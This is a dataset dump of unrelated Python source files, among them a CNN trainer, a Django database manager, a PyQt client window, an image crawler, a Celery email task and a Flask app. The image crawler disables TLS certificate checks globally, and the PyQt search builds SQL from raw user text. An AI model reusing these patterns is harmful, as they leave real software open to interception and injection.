CNN\nlayers = list()\n\n# Convolution layer\nC, H, W = 1, 28, 28\nFN, FH, FW = 30, 5, 5\nS = 1\nOH, OW = (H-FH)//S + 1, (W-FW)//S + 1\n\nimg_shape = (C, H, W)\nft_shape = (FN, FH, FW)\n\nlayers.append(Input(size=(1, H, W)))\n\nlayers.append(Convolution(img_shape, ft_shape))\nlayers.append(ReLU())\n\ninit_ft = np.copy(layers[1].ft)\n\n# Pooling layer\nC, H, W = FN, OH, OW\nPH, PW = 3, 3\nS = PH\nOH, OW = (H - PH) // S + 1, (W - PW) // S + 1\n\nimg_shape = (C, H, W)\npooling_shape = (PH, PW)\n\nlayers.append(Pooling(img_shape, pooling_shape))\n\nlayers.append(Flatten())\n\nlayers.append(FullyConnected(FN*OH*OW, 100))\nlayers.append(ReLU())\n\nlayers.append(FullyConnected(100, 10))\nlayers.append(Softmax())\n\nnn_list['CNN'] = {'NN': NeuralNetwork(layers, CrossEntropy, labels), 'SGD': SGD(0.2)}\n\n\n# fitting\naccuracy_list = list()\n\nfor k, v in nn_list.items():\n print(k)\n nn, sgd = v['NN'], v['SGD']\n tmp_accuracy_list = list()\n\n for epoch_idx in range(n_epoch):\n\n for tr_x, tr_y in next_batch(batch_size, x=training_x, y=training_y):\n sgd.update(nn, tr_x, tr_y)\n\n accuracy = 0.0\n\n for ts_x, ts_y in next_batch(100, x=test_x, y=test_y):\n tmp_accuracy = nn.get_accuracy(ts_x, [labels[np.argmax(y, axis=0)] for y in ts_y])\n accuracy += tmp_accuracy * 100\n\n accuracy /= 10000\n tmp_accuracy_list.append(accuracy)\n\n print(epoch_idx + 1, dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), accuracy)\n\n accuracy_list.append(tmp_accuracy_list)\n\nwith open(output_path + 'accuracy.pkl', 'wb') as f:\n pickle.dump((init_ft, nn_list['CNN']['NN'].layers[1].ft, accuracy_list), f)\n","sub_path":"deeplearning/CNN/conv_mnist_floydhub/main_mnist.py","file_name":"main_mnist.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"493627005","text":"import cv2\nimport pickle\n\ncv2.namedWindow(\"preview\")\nvc = cv2.VideoCapture(0)\nliteral = vc.read()\n \nif vc.isOpened(): # try to get the first frame\n rval, frame = vc.read()\nelse:\n rval = False\nc=0\nwhile rval:\n cv2.imshow(\"preview\", frame)\n rval, frame = vc.read()\n print(c)\n c += 1\ncv2.destroyWindow(\"preview\")","sub_path":"cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"610879432","text":"from decouple import config # noqa\nfrom templated_email import send_templated_mail\n\n\ndef compare_pokemons(pokemon_1, pokemon_2):\n pokemon_1_victory_points = 0\n pokemon_2_victory_points = 0\n\n if pokemon_1.attack > pokemon_2.defense:\n pokemon_1_victory_points += 1\n else:\n pokemon_2_victory_points += 1\n\n if pokemon_2.attack > pokemon_1.defense:\n pokemon_2_victory_points += 1\n else:\n pokemon_1_victory_points += 1\n\n if pokemon_1_victory_points == 2: # pokemon_1 wins # noqa\n return pokemon_1\n elif pokemon_2_victory_points == 2: # pokemon_2 wins\n return pokemon_2\n elif pokemon_1.hit_points > pokemon_2.hit_points: # in case of draw\n return pokemon_1\n else:\n return pokemon_2\n\n\ndef get_battle_result(battle):\n if not battle.has_been_resolved():\n raise Exception(\"Battle has not been resolved yet\")\n\n creator_victory_points = 0\n opponent_victory_points = 0\n\n pokemon_pairs = [\n (battle.creator_pokemon_1, battle.opponent_pokemon_1),\n (battle.creator_pokemon_2, battle.opponent_pokemon_2),\n (battle.creator_pokemon_3, battle.opponent_pokemon_3),\n ]\n\n for creator_pokemon, opponent_pokemon in pokemon_pairs:\n winner 
= compare_pokemons(creator_pokemon, opponent_pokemon)\n if winner == creator_pokemon:\n creator_victory_points += 1\n else:\n opponent_victory_points += 1\n\n if creator_victory_points > opponent_victory_points: # noqa\n return battle.creator\n else:\n return battle.opponent\n\n\ndef send_battle_result(battle):\n send_templated_mail(\n template_name=\"battle_result\",\n from_email=config(\"EMAIL_ADDRESS\"),\n recipient_list=[battle.creator.email, battle.opponent.email],\n context={\n \"battle_creator\": battle.creator.email,\n \"battle_opponent\": battle.opponent.email,\n \"battle_winner\": battle.winner.email,\n \"battle_id\": battle.id,\n \"battle_creator_pokemon_1\": battle.creator_pokemon_1.name,\n \"battle_creator_pokemon_2\": battle.creator_pokemon_2.name,\n \"battle_creator_pokemon_3\": battle.creator_pokemon_3.name,\n \"battle_opponent_pokemon_1\": battle.opponent_pokemon_1.name,\n \"battle_opponent_pokemon_2\": battle.opponent_pokemon_2.name,\n \"battle_opponent_pokemon_3\": battle.opponent_pokemon_3.name,\n },\n )\n","sub_path":"backend/battles/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"2293481","text":"import argparse\nimport os\nimport json\nimport codecs\nimport re\nfrom scipy.io import wavfile\n\nfrom torch.utils.data import random_split\nfrom random import shuffle\n\nparser = argparse.ArgumentParser(description='Liepa dataset processing')\nparser.add_argument('--data-dir', metavar='DIR',\n help='path to Liepa data', default='/home/wittykiosk/ino_voice_research/data/liepa')\nparser.add_argument('--train-perc', default=85, type=int, help='How many samples to use')\nparser.add_argument('--data-cut', default=50000, type=int, help='How many samples to use')\n\n\ndef generate_labels_json(labels):\n path = ROOT + \"/labels.json\"\n json_string = json.dumps(labels)\n with codecs.open(path, 'w', encoding='utf8') as f:\n f.write(json_string)\n\n\ndef find_all_liepa_files(starting_dir):\n all_paths_tuples = []\n for root, _, files in os.walk(starting_dir):\n path = re.split('\\/', root)\n file_name_set = set()\n for f in files:\n file_name = f[:-4]\n if file_name in file_name_set:\n text_file_name = file_name + \".txt\"\n audio_file_name = file_name + \".wav\"\n all_paths_tuples.append((os.sep.join(path + [text_file_name]), os.sep.join(path + [audio_file_name])))\n else:\n file_name_set.add(file_name)\n\n return all_paths_tuples\n\n\ndef write_txt(txt_file_path, text):\n with codecs.open(txt_file_path, 'w', encoding='utf8') as f:\n f.write(text)\n\n\ndef read_txt(txt_file_path):\n text = \"\"\n try:\n with open(txt_file_path, encoding=\"utf-16\") as file:\n text = file.read()\n except:\n try:\n with open(txt_file_path, encoding=\"utf-8\") as file:\n text = file.read()\n except:\n try:\n with open(txt_file_path, encoding=\"cp1257\") as file:\n text = file.read()\n except:\n try:\n with open(txt_file_path, encoding=\"iso8859_13\") as file:\n text = file.read()\n except:\n return None\n\n return text.rstrip()\n\n\ndef remove_underscores(text):\n remove = False\n is_first_char = True\n filtered_text = []\n for c in text:\n if not remove:\n if c == '_':\n if not is_first_char:\n remove = True\n else:\n is_first_char = c == ' '\n filtered_text.append(c)\n else:\n if c == ' ':\n remove = False\n filtered_text.append(c)\n\n return ''.join(filtered_text)\n\n\ndef filter_text(text):\n for tok in SPECIAL_TOKENS:\n text = text.replace(tok, '')\n text = 
remove_underscores(text)\n\n filtered_text = []\n for c in text.upper():\n if c in ALL_TOKENS:\n filtered_text.append(c)\n\n text = ''.join(filtered_text)\n return re.sub(' +', ' ', text)\n\n\ndef read_wav(wav_file_path):\n try:\n return wavfile.read(wav_file_path)\n except ValueError:\n return None\n\n\ndef preprocess_sample(paths_tuple):\n txt_file, audio_file = paths_tuple\n\n text_data = read_txt(txt_file)\n if text_data is None:\n return None\n text_data = filter_text(text_data)\n write_txt(txt_file, text_data)\n\n wav_data = read_wav(audio_file)\n if wav_data is None:\n return None\n\n return text_data, txt_file, audio_file\n\n\ndef create_slices_from_ratios(dataset, ratios):\n total_size = len(dataset)\n lengths = []\n for i in range(len(ratios)):\n if i != len(ratios) - 1:\n lengths.append(round(ratios[i] * total_size))\n else:\n lengths.append(total_size - sum(lengths))\n return lengths\n\n\ndef create_manifest(samples, name):\n manifest_path = ROOT + \"/manifests/\"\n if not os.path.exists(manifest_path):\n os.makedirs(manifest_path)\n\n with open(manifest_path + name + \"-manifest.csv\", \"w+\") as f:\n for sample in samples:\n f.write(sample[1] + \",\" + sample[0] + \"\\n\")\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n\n # Get repository root dir\n ROOT = '/'.join(os.path.dirname(os.path.realpath(__file__)).split('/')[:-1])\n DATA_ROOT = args.data_dir\n\n SPECIAL_TOKENS = {' _pauze', ' _tyla', ' _ikvepimas', ' _iskvepimas'}\n ALL_TOKENS = ['_', 'L', 'I', 'E', 'T', 'U', 'V', 'Š', 'K', 'J', 'R', 'Y',\n 'Ž', 'A', 'P', 'Z', 'D', 'S', 'M', 'O', 'C', 'H', 'Ū', 'N',\n 'Č', 'Ų', 'F', 'B', 'Ė', 'G', 'Į', 'Ą', 'Ę', 'W', ' ']\n\n generate_labels_json(ALL_TOKENS)\n print(\"All tokens: \\n{}\".format(ALL_TOKENS))\n\n file_paths_tuples = find_all_liepa_files(DATA_ROOT)\n preprocessed_file_paths = map(preprocess_sample, file_paths_tuples)\n samples = [paths_tuple for paths_tuple in preprocessed_file_paths if paths_tuple]\n\n\n def my_key(paths_tuple):\n text_data, _, _, = paths_tuple\n return len(text_data)\n\n\n samples = [(txt_file, audio_file) for _, txt_file, audio_file in sorted(samples, key=my_key)]\n\n if args.data_cut is not None:\n samples = samples[:args.data_cut]\n\n slices = [args.train_perc / 100, (100 - args.train_perc) / 100]\n train_samples, valid_samples = random_split(samples, create_slices_from_ratios(samples, slices))\n print (\"Training samples: {}\".format(len(train_samples)))\n print (\"Validation samples: {}\".format(len(valid_samples)))\n\n create_manifest(train_samples, \"train\")\n create_manifest(valid_samples, \"valid\")\n","sub_path":"data/liepa_processing.py","file_name":"liepa_processing.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"29167353","text":"from collections import deque\n\ndef solution(s):\n answer = ''\n \n lower = []\n upper = []\n\n for i in range(len(s)):\n if s[i].islower():\n lower.append(s[i])\n elif s[i].isupper():\n upper.append(s[i])\n\n lower.sort()\n upper.sort()\n\n lower.reverse()\n upper.reverse()\n\n result = lower + upper\n answer = ''.join(result)\n\n return answer\n\n'''\ndef solution(s):\n return ''.join(sorted(s, reverse=True))\n'''","sub_path":"Level1/lv1_12.py","file_name":"lv1_12.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"208870443","text":"from libservice.db.models.BaseModel import BaseModel\n\nfrom 
flask_sqlalchemy import SQLAlchemy\n\nfrom sqlalchemy.engine.reflection import Inspector\n\n# Must include all Database objects here to be properly initialized and created if needed\n\nfrom ConfigManager import ConfigManager\nfrom FlaskModule import flask_app\n\n# Alembic\nfrom alembic.config import Config\nfrom alembic import command\n\n\nclass DBManager:\n \"\"\"db_infos = {\n 'user': '',\n 'pw': '',\n 'db': '',\n 'host': '',\n 'port': '',\n 'type': ''\n }\"\"\"\n\n def __init__(self, app=flask_app, test: bool = False):\n self.db_uri = None\n self.db = SQLAlchemy()\n self.app = app\n self.test = test\n\n def create_defaults(self, config: ConfigManager):\n pass\n\n def open(self, db_infos, echo=False):\n self.db_uri = 'postgresql://%(user)s:%(pw)s@%(host)s:%(port)s/%(db)s' % db_infos\n\n self.app.config.update({\n 'SQLALCHEMY_DATABASE_URI': self.db_uri,\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False,\n 'SQLALCHEMY_ECHO': echo\n })\n\n # Create db engine\n self.db.init_app(self.app)\n self.db.app = self.app\n\n BaseModel.set_db(self.db)\n\n with self.app.app_context():\n BaseModel.create_all()\n\n inspector = Inspector.from_engine(self.db.engine)\n tables = inspector.get_table_names()\n\n if not tables:\n # New database - stamp with current revision version\n self.stamp_db()\n else:\n # Apply any database upgrade, if needed\n self.upgrade_db()\n\n def open_local(self, db_infos, echo=False):\n self.db_uri = 'sqlite://'\n\n self.app.config.update({\n 'SQLALCHEMY_DATABASE_URI': self.db_uri,\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False,\n 'SQLALCHEMY_ECHO': echo\n })\n\n # Create db engine\n self.db.init_app(self.app)\n self.db.app = self.app\n BaseModel.set_db(self.db)\n\n with self.app.app_context():\n BaseModel.create_all()\n\n inspector = Inspector.from_engine(self.db.engine)\n tables = inspector.get_table_names()\n\n if not tables:\n # New database - stamp with current revision version\n self.stamp_db()\n else:\n # Apply any database upgrade, if needed\n self.upgrade_db()\n\n def init_alembic(self):\n import sys\n import os\n # determine if application is a script file or frozen exe\n if getattr(sys, 'frozen', False):\n # If the application is run as a bundle, the pyInstaller bootloader\n # extends the sys module by a flag frozen=True and sets the app\n # path into variable _MEIPASS'.\n this_file_directory = sys._MEIPASS\n # When frozen, file directory = executable directory\n root_directory = this_file_directory\n else:\n this_file_directory = os.path.dirname(os.path.abspath(__file__))\n root_directory = os.path.join(this_file_directory, '..' 
+ os.sep + '..')\n\n # this_file_directory = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))\n\n alembic_directory = os.path.join(root_directory, 'alembic')\n ini_path = os.path.join(root_directory, 'alembic.ini')\n\n # create Alembic config and feed it with paths\n alembic_config = Config(ini_path)\n alembic_config.set_main_option('script_location', alembic_directory)\n alembic_config.set_main_option('sqlalchemy.url', self.db_uri)\n\n return alembic_config\n\n def upgrade_db(self):\n alembic_config = self.init_alembic()\n\n # prepare and run the command\n revision = 'head'\n sql = False\n tag = None\n\n # upgrade command\n command.upgrade(alembic_config, revision, sql=sql, tag=tag)\n\n def stamp_db(self):\n alembic_config = self.init_alembic()\n\n # prepare and run the command\n revision = 'head'\n sql = False\n tag = None\n\n # Stamp database\n command.stamp(alembic_config, revision, sql, tag)\n\n\nif __name__ == '__main__':\n config = ConfigManager()\n config.create_defaults()\n manager = DBManager()\n manager.open_local({}, echo=True)\n manager.create_defaults(config)\n","sub_path":"teraserver/python/examples/service/libservice/db/DBManager.py","file_name":"DBManager.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"183325933","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtCore, QtGui, QtSql, uic\n\nimport sys, time\n\nfrom functools import partial\n\nimport Noncache_Clients_Edit_Window, Move_Window, QCustomContextMenu, Settings\n\nclass TableViewModel(QtSql.QSqlTableModel):\n\t\tdef data(self, index, role=QtCore.Qt.DisplayRole):\n\t\t\t\tif role == QtCore.Qt.BackgroundRole :\n\t\t\t\t\t\ttry :\n\t\t\t\t\t\t\tbalance_val = float(index.sibling(index.row(), 3).data())\n\t\t\t\t\t\t\tif balance_val < 1000 :\n\t\t\t\t\t\t\t\tif balance_val < 200 : rowColor = QtGui.QColor(255, 80, 80)\n\t\t\t\t\t\t\t\telse : rowColor = QtGui.QColor(226, 212, 103)\n\t\t\t\t\t\t\telse : rowColor = QtGui.QColor(255, 255, 255)\n\t\t\t\t\t\t\treturn rowColor\n\t\t\t\t\t\texcept : pass\n\n\t\t\t\tif role == QtCore.Qt.TextAlignmentRole:\n\t\t\t\t\t\tif index.column() == 3 : return QtCore.Qt.AlignRight|QtCore.Qt.AlignVCenter\n\n\t\t\t\treturn QtSql.QSqlTableModel.data(self, index, role)\n\n\n\nclass Noncache_Clients_Win_Class(QtGui.QDialog) :\n\t\tdef __init__(self, parent=None) :\n\t\t\t\tQtGui.QDialog.__init__(self, parent)\n\t\t\t\tuic.loadUi(\"ui/nonCacheClients.ui\", self)\n\n\t\t\t\tself.setWindowFlags(QtCore.Qt.Dialog | QtCore.Qt.WindowTitleHint)\n\t\t\t\tself.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n\n\t\t\t\t# Link to Main From\n\t\t\t\tself.MainWin_link = parent\n\n\t\t\t\t# Window Title\n\t\t\t\tself.setWindowTitle(Settings.Settings().winTitleName('Справочник безналичных клиентов'))\n\n\t\t\t\t# Initialize Form\n\t\t\t\tself.init_form()\n\n\t\t\t\tself.tableView.doubleClicked.connect(partial(self.double_clicked, False))\n\n\t\t\t\tself.ln_Client_Search.textChanged.connect(self.Fast_Client_Search)\n\n\t\t\t\t# Custom Context Menu\n\t\t\t\tself.customContextMenu = QCustomContextMenu.QCustomContextMenu()\n\t\t\t\tQtCore.QObject.connect(self.customContextMenu, QtCore.SIGNAL('addItem'), partial(self.double_clicked, True))\n\t\t\t\tQtCore.QObject.connect(self.customContextMenu, QtCore.SIGNAL('changeItem'), partial(self.double_clicked, False))\n\t\t\t\tQtCore.QObject.connect(self.customContextMenu, QtCore.SIGNAL('removeItem'), 
self.removeClient)\n\n\t\t\t\tself.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n\t\t\t\tself.customContextMenuRequested[QtCore.QPoint].connect(self.showContextMenu)\n\n\t\t\t\t# Hotkeys\n\t\t\t\tself.enterHotkey, self.insertHotkey, self.deleteHotkey, self.escHotkey = QtGui.QAction(self), QtGui.QAction(self),\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t QtGui.QAction(self), QtGui.QAction(self)\n\n\t\t\t\tself.enterHotkey.setShortcut(QtGui.QKeySequence(QtCore.Qt.Key_Return))\n\t\t\t\tself.insertHotkey.setShortcut(QtGui.QKeySequence(QtCore.Qt.Key_Insert))\n\t\t\t\tself.deleteHotkey.setShortcut(QtGui.QKeySequence(QtCore.Qt.Key_Delete))\n\t\t\t\tself.escHotkey.setShortcut(QtGui.QKeySequence(QtCore.Qt.Key_Escape))\n\n\t\t\t\tself.enterHotkey.triggered.connect(partial(self.double_clicked, False))\n\t\t\t\tself.insertHotkey.triggered.connect(partial(self.double_clicked, True))\n\t\t\t\tself.deleteHotkey.triggered.connect(self.removeClient)\n\t\t\t\tself.escHotkey.triggered.connect(self.close)\n\n\t\t\t\tself.tableView.addAction(self.enterHotkey)\n\t\t\t\tself.tableView.addAction(self.insertHotkey)\n\t\t\t\tself.tableView.addAction(self.deleteHotkey)\n\t\t\t\tself.tableView.addAction(self.escHotkey)\n\n\t\t\t\tself.tableView.horizontalHeader().setResizeMode(QtGui.QHeaderView.Stretch)\n\t\t\t\tself.tableView.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)\n\n\n\t\tdef init_form(self) :\n# self.noncache_clients_model = QtSql.QSqlTableModel()\n\t\t\t\tself.noncache_clients_model = TableViewModel()\n\t\t\t\tself.noncache_clients_model.setTable('NONCACHE_CLIENTS')\n\n\t\t\t\tself.noncache_clients_model.setEditStrategy(QtSql.QSqlTableModel.OnManualSubmit)\n\n\t\t\t\tself.noncache_clients_model.setHeaderData(1, QtCore.Qt.Horizontal, \"Клиент\")\n\t\t\t\tself.noncache_clients_model.setHeaderData(2, QtCore.Qt.Horizontal, \"Комментарий\")\n\t\t\t\tself.noncache_clients_model.setHeaderData(3, QtCore.Qt.Horizontal, \"Баланс\")\n\n\t\t\t\t# Set not-editable cells\n\t\t\t\tself.tableView.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)\n\t\t\t\t# Set selection to all row\n\t\t\t\tself.tableView.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\n\n\t\t\t\tself.noncache_clients_model.select()\n\t\t\t\tself.tableView.setModel(self.noncache_clients_model)\n\n# self.tableView.setItemDelegateForColumn(3, PaintDelegate_Noncache_Clients())\n\t\t\t\t# Hide columns\n\t\t\t\t# ID Client\n\t\t\t\tself.tableView.hideColumn(0)\n\t\t\t\t# Client Password\n\t\t\t\tself.tableView.hideColumn(4)\n\t\t\t\t# Client Password\n\t\t\t\tself.tableView.hideColumn(5)\n\t\t\t\t# Isblocked status\n\t\t\t\tself.tableView.hideColumn(6)\n\t\t\t\t# Operator comment\n\t\t\t\tself.tableView.hideColumn(7)\n\n\n\t\tdef double_clicked (self, isNewClient) :\n\t\t\t\tif not isNewClient :\n\t\t\t\t\t\tcurr_row = self.tableView.currentIndex().row()\n\t\t\t\t\t\tif curr_row == -1 : curr_row = 0\n\n\t\t\t\t\t\tclient_id = self.noncache_clients_model.index(curr_row, 0)\n\t\t\t\t\t\t# Class constructor expect 4 parameters: Link to MainWindows, record Serial ID, isNewDriver Boolean, Link to self class\n\t\t\t\t\t\tself.Noncache_Clients_Edit_Win_Widget = Noncache_Clients_Edit_Window.Noncache_Clients_Edit_Win_Class(self.MainWin_link, client_id.data(), isNewClient, self)\n\n\t\t\t\telse : self.Noncache_Clients_Edit_Win_Widget = Noncache_Clients_Edit_Window.Noncache_Clients_Edit_Win_Class(self.MainWin_link, \"\", isNewClient, 
self)\n\n\t\t\t\tself.Noncache_Clients_Edit_Win_Widget.show()\n\t\t\t\tMove_Window.Move_Window(self, self.Noncache_Clients_Edit_Win_Widget).Set_Center()\n\n\n\t\tdef removeClient(self):\n\t\t\tcurr_row = self.tableView.currentIndex().row()\n\t\t\tclientName = self.noncache_clients_model.index(curr_row, 1).data()\n\t\t\tconfirm_str = 'Вы действительно хотите удалить категорию %s?' % clientName\n\t\t\treply = QtGui.QMessageBox.question(self, 'Удаление клиента', confirm_str, QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No)\n\n\t\t\tif (curr_row != -1 and reply == QtGui.QMessageBox.Yes):\n\t\t\t\tself.noncache_clients_model.removeRows(curr_row, 1)\n\t\t\t\tupdate_success = self.noncache_clients_model.submitAll()\n\n\t\t\t\tif not update_success :\n\t\t\t\t\tQtGui.QMessageBox.critical(self, \"Ошибка удаления\", \"Ошибка удаления.\\n\"+self.noncache_clients_model.lastError().text(), QtGui.QMessageBox.Ok)\n\t\t\t\t\tself.noncache_clients_model.select()\n\n\n\t\tdef Fast_Client_Search (self):\n\t\t\t\tsearch_text = self.ln_Client_Search.text()\n\t\t\t\tself.noncache_clients_model.setFilter(\"CLIENT_NAME LIKE '%\"+search_text+\"%'\")\n\n\n\t\tdef showContextMenu(self):\n\t\t\tself.customContextMenu.exec_(QtGui.QCursor.pos())\n","sub_path":"src/Noncache_Clients_Window.py","file_name":"Noncache_Clients_Window.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"339650947","text":"from django.conf.urls import url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.views.decorators.cache import cache_page\n\nfrom . import views\n\nurlpatterns = [\n\n    url(r'^$', views.ProductsPerCategoryView.as_view(), name='products'),\n    #url(r'^$', views.ProductListView.as_view(), name='products'),\n    url(r'^tags/$', views.TagView.as_view(), name='tags'),\n\n    # Modal view as detail view for a product\n    url(r'^product/(?P<slug>[\\w-]+)/$', views.ProductDetailView.as_view(), name='product-detail'),\n\n\n    url(r'^quotation/$', views.QuotationView.as_view(), name='quotation'),\n    url(r'^quotation/confirm/$', views.QuotationConfirmView, name='quotation-confirm'),\n    url(r'^featured/$', views.HomepageFeaturedProducts.as_view(), name='featured-products'),\n\n    url(r'^services/$', views.ServicesModalView.as_view(), name='services-modal'),\n    url(r'^suppliers/$', views.SupplierView.as_view(), name='suppliers'),\n\n\n    url(r'test/$', views.ProductsPerCategoryView.as_view(), name='products-per-category'),\n]\n","sub_path":"tcps/tcps/apps/catalogue/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15582215","text":"from google_images_download import google_images_download\n\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\ndef imageCrawling(keyword,dir):\n    response = google_images_download.googleimagesdownload()\n\n    arguments={\"keywords\":keyword,\n               \"limit\":600,\n               \"format\":'jpg',\n               \"print_urls\":True,\n               \"no_directory\":True,\n               \"chromedriver\":'chromedriver.exe',\n               \"output_directory\":dir}\n\n    paths = response.download(arguments)\n    print(paths)\n\nimageCrawling('ShihTzu','E:\\\\ShihTzu')\nimageCrawling('retriever','E:\\\\retriever')\n","sub_path":"googleimage.py","file_name":"googleimage.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"360245237","text":"# 
Definition for a undirected graph node\n# class UndirectedGraphNode:\n# def __init__(self, x):\n# self.label = x\n# self.neighbors = []\n\nclass Solution:\n # @param node, a undirected graph node\n # @return a undirected graph node\n def cloneGraph(self, node):\n if node == None: return None\n m = {}\n queue = collections.deque()\n queue.append(node)\n while queue:\n cur = queue.popleft()\n if cur not in m:\n m[cur] = UndirectedGraphNode(cur.label)\n for neighbor in cur.neighbors:\n if neighbor not in m:\n m[neighbor] = UndirectedGraphNode(neighbor.label)\n queue.append(neighbor)\n m[cur].neighbors.append(m[neighbor]) \n return m[node]\n","sub_path":"Facebook/CloneGraph_133.py","file_name":"CloneGraph_133.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"40082985","text":"from django.core.mail import send_mail\nfrom django.conf import settings\nfrom celery_tasks.main import app\n\n\n@app.task(bind=True, name='send_active_mail', retry_backoff=3)\ndef send_active_mail(self, to, verify_url):\n subject = '美多商城-邮箱激活'\n html_message = '
<p>尊敬的用户您好!</p>' \\\n                   '<p>感谢您使用美多商城。</p>' \\\n                   '<p>您的邮箱为:%s 。请点击此链接激活您的邮箱:</p>' \\\n                   '<p><a href=\"%s\">%s</a></p>
' % (to, verify_url, verify_url)\n try:\n send_mail(subject, '', settings.EMAIL_FROM, [to], html_message=html_message)\n except Exception as e:\n self.retry(exc=e, max_retries=3)\n","sub_path":"meiduo_mall/celery_tasks/email_active/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"433811092","text":"\nimport logging\n\nimport gevent\nfrom gevent.monkey import patch_socket\npatch_socket()\n\nimport feedparser\n\nfrom django.db import transaction\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.db.utils import IntegrityError\n\nfrom search.models import (\n SourceLinks,\n JobsData\n)\n\n\nclass Command(BaseCommand):\n\n help = \"Le Spiduer\"\n\n def handle(self, **options):\n\n job_sources = SourceLinks.objects.all() # # values_list(\"url\", flat=True)\n\n def get_posts(job_source):\n\n feeds = feedparser.parse(job_source.url)['entries']\n\n with transaction.atomic(): # # Commits all entries in one transaction\n for feed in feeds:\n\n job_url = feed.get('link')\n job_title = feed.get('title')\n\n if job_url and job_title:\n try:\n JobsData.objects.get_or_create(\n url=job_url,\n title=job_title,\n source=job_source\n )\n except IntegrityError:\n pass\n\n if job_sources:\n try:\n gevent.joinall(\n [gevent.spawn(get_posts, url) for url in job_sources]\n )\n except Exception as e:\n logging.error(str(e))\n","sub_path":"search/management/commands/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"147464292","text":"from flask import Flask, redirect, render_template, request, url_for, jsonify, send_from_directory\nimport dao_rnn\n# from flask_assets import Environment, Bundle\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n# assets = Environment(app)\n\n'''\n$ export FLASK_APP=hello.py\n$ export FLASK_DEBUG=1\n$ flask run\n * Running on http://127.0.0.1:5000/\ndeep learning klasifikasi teks metode rnn\npython, tensorflow, tflearn, hadoop, hive, flask\n'''\n\nRESULTS = {\n \"name\": \"Klasifikasi Jenis Naskah Dinas\",\n \"children\": [\n {\n \"name\": \"Naskah Dinas Peraturan\",\n \"children\": [\n {\n \"name\": \"Peraturan\",\n \"children\": []\n },\n {\n \"name\": \"Edaran\",\n \"children\": []\n },\n {\n \"name\": \"Prosedur Operasional Standar Administrasi Pemerintahan\",\n \"children\": []\n }\n ]\n },\n {\n \"name\": \"Naskah Dinas Penetapan\",\n \"children\": [\n {\n \"name\": \"Keputusan\",\n \"children\": []\n }\n ]\n },\n {\n \"name\": \"Naskah Dinas Penugasan\",\n \"children\": [\n {\n \"name\": \"Instruksi\",\n \"children\": []\n },\n {\n \"name\": \"Surat Perintah\",\n \"children\": []\n },\n {\n \"name\": \"Surat Tugas\",\n \"children\": []\n }\n ]\n },\n {\n \"name\": \"Naskah Dinas Korespondensi\",\n \"children\": [\n {\n \"name\": \"Nota Dinas\",\n \"children\": []\n },\n {\n \"name\": \"Memo\",\n \"children\": []\n },\n {\n \"name\": \"Surat Dinas\",\n \"children\": []\n },\n {\n \"name\": \"Surat Undangan\",\n \"children\": []\n },\n {\n \"name\": \"Surat Pengantar\",\n \"children\": []\n }\n ]\n },\n {\n \"name\": \"Naskah Dinas Khusus\",\n \"children\": [\n {\n \"name\": \"Nota Kesepahaman\",\n \"children\": []\n },\n {\n \"name\": \"Perjanjian Kerja sama\",\n \"children\": []\n },\n {\n \"name\": \"Surat Kuasa\",\n \"children\": []\n },\n {\n \"name\": \"Berita acara\",\n 
